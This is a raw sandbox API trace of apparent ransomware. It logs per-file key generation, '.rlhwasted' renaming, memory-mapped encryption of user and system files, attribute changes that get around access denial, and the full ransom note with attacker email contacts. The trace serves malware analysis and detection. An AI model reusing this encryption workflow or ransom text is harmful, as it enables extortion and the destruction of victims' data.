(HeapHandle=0x6b0000, Flags=0x0, Size=0x27c) returned 0x6d4580 [0201.186] lstrcpyW (in: lpString1=0x6d45f2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.186] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.186] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0201.187] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.187] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.rlhwasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0201.187] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0201.189] SetEndOfFile (hFile=0x104) returned 1 [0201.189] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.189] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.189] lstrcpyW (in: lpString1=0x6d45f2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.rlhwasted")) returned 1 [0201.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.rlhwasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0201.190] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0201.190] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xbde6b [0201.191] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbde6b) returned 0x1340000 [0201.191] CloseHandle (hObject=0x124) returned 1 [0201.279] UnmapViewOfFile (lpBaseAddress=0x1340000) returned 1 [0201.288] CloseHandle (hObject=0x128) returned 1 [0201.288] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0201.288] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0201.289] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0201.289] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.289] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0201.289] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0201.290] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.301] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a0 [0201.301] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0201.301] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.301] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dBefc1U15iGb0SILgqNpzBY4GFMBNduOYFB8ahjXJk/EG7pmPJ8hE1loDeUuxrV1\r\nk7MO9gT8xEkVM5IBXS4fiuix2SBiB2QXQ656RraVrDyOfAmxbW3Ms5ANr2LEJEY0\r\nC25B28qinAqAvGyRlbJ6JSBkO1zHujfXPyLGUGv2lSPxIs5nPRABCzTrEJaFjALz\r\nh28HpKZb4BOGC2wEhTpcNaYbo8reKUf6MqZe03FgX6tHLtY2JyIWzEGUPd460Njo\r\negFdGGV7otqghCcmrD3+MBi5S4l2Ftyh6zH7gzEIS60bDTV3zWLuu4EC/n0bsqyA\r\nw6yMJmdOcYxR/qSIHjrvoWcdoHi03jDXRAb8p7mxdFbXsZQrSbr2WBvi3BCAMcWa\r\niR71m1iW1iJhItDp+X6XyVe6AEwzVcvzCUKbkhPhNh7lWUJ3aXbaw6K3vTEe0+/K\r\nsnMzPFS6BD3qJpmsZ2Rerwn5Ehr/LnJeUIRxAHcLrKlaNnjG8cJc71mfrHd07uGY\r\nMv09d2YippbAyYsq1Nsdbyb1HQ2TxROibeObnnjwns6y0XxjZ6iga4+g8rVI7lGl\r\nuSGi234yZWZDWsFtPhBw4F1FFk3hmnQ6XUak3phK4X6qrqMUES/x8C2+GuOA/uVO\r\nM+oooTrTpcteNlVG89RrNKs6mMi/Sm7a00MUMcuEGtK=[end_key]\r\nKEEP IT\r\n") returned 981 [0201.301] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a0 | out: hHeap=0x6b0000) returned 1 [0201.302] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0201.302] SetEndOfFile (hFile=0x104) returned 1 [0201.304] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.304] CloseHandle (hObject=0x104) returned 1 [0201.304] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0201.304] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x706ba0 | out: hHeap=0x6b0000) returned 1 [0201.305] _aulldvrm () returned 0x0 [0201.305] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0201.306] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0201.306] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.306] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0201.306] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29e) returned 0x6d4580 [0201.306] lstrcpyW (in: lpString1=0x6d4614, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0201.306] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0201.306] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0201.307] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0201.307] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0201.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.rlhwasted_info" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0201.312] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0201.313] SetEndOfFile (hFile=0x104) returned 1 [0201.313] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.313] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0201.313] lstrcpyW (in: lpString1=0x6d4614, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0201.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.rlhwasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.rlhwasted")) returned 1 [0201.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.rlhwasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0201.314] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0201.314] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x940000 [0201.314] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x940000) returned 0x14a0000 [0201.315] CloseHandle (hObject=0x128) returned 1 [0202.276] UnmapViewOfFile (lpBaseAddress=0x14a0000) returned 1 [0202.399] CloseHandle (hObject=0x10c) returned 1 [0202.403] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0202.403] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0202.433] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0202.436] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0202.437] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0202.441] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0202.441] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0202.449] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d56a0 [0202.449] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0202.449] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0202.450] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]V7Buyj8MqwB5Hq5vxZMPlRer/b1DMLxNeDuttp241CgNMub9xkc0UK0mrYPaooE5\r\n/aMfYFiq7X7isBYKvTIBU7RWm4JFjVv71jQg4wjAmoix7t09bMNrJvU8BRfuts7h\r\nLt+bgxuifQQ27sHKynnC0mMzV14lkPbvutU/zTdBx2lk8hLrGLX0xzPQ4SWkj6mj\r\nHsMdoFFPBssXYDDwNdUM4rFkBiQV9Bb7dYOyuebofu/qRkThoL79hVvue+z7DPTJ\r\nf6tIRSZY8B+XKawCJfn7ZKMoLrBLi8iISUCMSY1cOVWk+4CpYYdLmxte1Q715/L2\r\nLRvXroh6HEMV07TrHfGBNPWwLIkX4aWQ/nXSzwb/hqV72lc3E6DKGJ8ANQ6lq91p\r\nRZP5rFK+qQ/iGaFYPPDq+Sbe6vq2XZd2afCjIVjkUfOGn3mV1tcxNkzGC68t8vLz\r\ncvQ3hp/fLremQBTw8rv7rr9T8bn33YmSS+u3M4C8IKGpS/qEVS/KT29H+z2gvWaP\r\nJ1EEJluDBVXxo6aIHTfuPUydPp7ah8mZ5atBbKP7T3zVw5gI85eQ10z3/obGe6hm\r\n6kQ/QgpmkXDTtq3qctlRuHMjQ/nkYhSvbzfxvZIMuaG2KI8pIffHjAGS4I8OscFZ\r\nbIy591vnttSwud0EF2Muwiu75uXTkcZRuaDaM4r/x+z=[end_key]\r\nKEEP IT\r\n") returned 981 [0202.450] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56a0 | out: hHeap=0x6b0000) returned 1 [0202.450] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0202.450] SetEndOfFile (hFile=0x104) returned 1 [0202.452] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0202.452] CloseHandle (hObject=0x104) returned 1 [0202.452] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0202.452] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec6c8 | out: hHeap=0x6b0000) returned 1 [0202.453] SetEvent (hEvent=0xf8) returned 1 [0202.453] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xffffffff) Thread: id = 339 os_tid = 0x728 [0181.948] WaitForMultipleObjects (nCount=0x2, lpHandles=0x12aff80*=0xf8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0181.948] ResetEvent (hEvent=0xf8) returned 1 [0181.948] _aulldvrm () returned 0x0 [0181.948] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6e9050) returned 1 [0181.949] CryptGenRandom (in: hProv=0x6e9050, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0181.949] CryptReleaseContext (hProv=0x6e9050, dwFlags=0x0) returned 1 [0181.949] lstrlenW (lpString="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0181.949] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x230) returned 0x6e92f0 [0181.949] lstrcpyW (in: lpString1=0x6e9316, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0181.949] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e9528 [0181.949] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6d5ae0) returned 1 [0181.950] CryptGenRandom (in: hProv=0x6d5ae0, dwLen=0xa34, pbBuffer=0x6e9528 | out: pbBuffer=0x6e9528) returned 1 [0181.950] CryptReleaseContext (hProv=0x6d5ae0, dwFlags=0x0) returned 1 [0181.950] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted_info" (normalized: "c:\\bootsect.bak.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0181.951] WriteFile (in: hFile=0x110, lpBuffer=0x6e9528*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e9528*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0181.952] SetEndOfFile (hFile=0x110) returned 1 [0181.952] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0181.952] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e9528 | out: hHeap=0x6b0000) returned 1 [0181.952] lstrcpyW (in: lpString1=0x6e9316, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0181.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted" (normalized: "c:\\bootsect.bak.rlhwasted")) returned 1 [0181.954] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted" (normalized: "c:\\bootsect.bak.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.954] GetLastError () returned 0x5 [0181.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted" (normalized: "c:\\bootsect.bak.rlhwasted")) returned 0x27 [0181.955] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted", dwFileAttributes=0x26) returned 1 [0181.955] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted" (normalized: "c:\\bootsect.bak.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0181.955] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0181.955] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x2000 [0181.955] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2000) returned 0x6a0000 [0181.955] CloseHandle (hObject=0x114) returned 1 [0182.363] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0182.363] CloseHandle (hObject=0x118) returned 1 [0182.363] SetFileAttributesW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK.rlhwasted", dwFileAttributes=0x27) returned 1 [0182.363] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6ea568 [0182.363] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6e9120) returned 1 [0182.364] CryptGenRandom (in: hProv=0x6e9120, dwLen=0x1b8, pbBuffer=0x6ea5b0 | out: pbBuffer=0x6ea5b0) returned 1 [0182.364] CryptReleaseContext (hProv=0x6e9120, dwFlags=0x0) returned 1 [0182.364] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6e9120) returned 1 [0182.365] CryptGenRandom (in: hProv=0x6e9120, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0182.365] CryptReleaseContext (hProv=0x6e9120, dwFlags=0x0) returned 1 [0182.388] SetEndOfFile (hFile=0x110) returned 1 [0182.390] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eab80 | out: hHeap=0x6b0000) returned 1 [0182.390] CloseHandle (hObject=0x110) returned 1 [0182.391] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0182.392] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6bf180 | out: hHeap=0x6b0000) returned 1 [0182.392] WaitForMultipleObjects (nCount=0x2, lpHandles=0x12aff80*=0xf8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0183.583] ResetEvent (hEvent=0xf8) returned 1 [0183.583] _aulldvrm () returned 0x0 [0183.583] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6d5ae8) returned 1 [0183.583] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.584] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.584] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0183.584] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6ec7d0 [0183.584] lstrcpyW (in: lpString1=0x6ec86e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.584] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eca80 [0183.584] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6d5ae8) returned 1 [0183.584] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0xa34, pbBuffer=0x6eca80 | out: pbBuffer=0x6eca80) returned 1 [0183.584] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.585] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0183.587] WriteFile (in: hFile=0x114, lpBuffer=0x6eca80*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eca80*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.588] SetEndOfFile (hFile=0x114) returned 1 [0183.588] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.588] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eca80 | out: hHeap=0x6b0000) returned 1 [0183.588] lstrcpyW (in: lpString1=0x6ec86e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.rlhwasted")) returned 1 [0183.589] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0183.589] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0183.589] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x61d [0183.589] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61d) returned 0x6a0000 [0183.590] CloseHandle (hObject=0x124) returned 1 [0183.592] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.592] CloseHandle (hObject=0x128) returned 1 [0183.592] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eca80 [0183.593] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6d5ae8) returned 1 [0183.593] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0x1b8, pbBuffer=0x6ecac8 | out: pbBuffer=0x6ecac8) returned 1 [0183.593] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.593] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6d5ae8) returned 1 [0183.594] CryptGenRandom (in: hProv=0x6d5ae8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.594] CryptReleaseContext (hProv=0x6d5ae8, dwFlags=0x0) returned 1 [0183.603] SetEndOfFile (hFile=0x114) returned 1 [0183.605] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed098 | out: hHeap=0x6b0000) returned 1 [0183.605] 